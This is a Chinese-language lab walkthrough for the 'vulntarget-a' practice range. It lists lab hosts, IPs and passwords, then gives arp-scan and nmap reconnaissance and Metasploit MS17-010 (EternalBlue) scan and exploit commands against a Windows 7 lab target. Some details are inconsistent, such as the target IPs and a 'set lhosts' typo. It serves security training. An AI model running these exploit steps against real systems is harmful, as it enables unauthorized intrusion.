Vulntarget-a
参考网址:
[永久开源] vulntarget-a_打靶记录 (qq.com)
环境搭建
攻击主机:Kali、Windows
目标主机:Win7、Win2016、Win2019
网络连接:
按照攻略给出的网络拓扑做出以下的网络配置。
内网部署
DC:Win2019
账号:administrator
密码:Admin@666
网卡:VMnet1
IP:10.0.10.110
Win2016
账号:vulntarget.com\win2016
密码:Admin#123
网卡1:VMnet2
IP1:10.0.20.99
网卡2:VMnet1
IP2:10.0.10.111
DNS:10.0.10.110
Win7
账号:win7
密码:admin
网卡1:NAT模式
IP1:192.168.127.91
网卡2:VMnet2
IP2:10.0.20.98
渗透测试
信息收集
IP扫描
- 使用kali下的arp-scan工具进行IP扫描,收集IP信息
sudo arp-scan -l
扫描到了个目标IP:192.168.127.128
端口扫描
- 使用kali下的nmap工具对两个目标进行端口扫描
该操作系统为Windows 7,开放了80、135、139、445端口,系统内有SMB服务,可能存在永恒之蓝漏洞。
漏洞探测
使用kali下的msf工具进行探测,该系统是否存在永恒之蓝漏洞。
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.127.128
run
确实存在永恒之蓝漏洞,利用该漏洞进行攻击
漏洞利用
使用kali下的msf工具进行探测,该系统是否存在永恒之蓝漏洞。
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts 192.168.127.128
set lhosts 192.168.127.129
run
</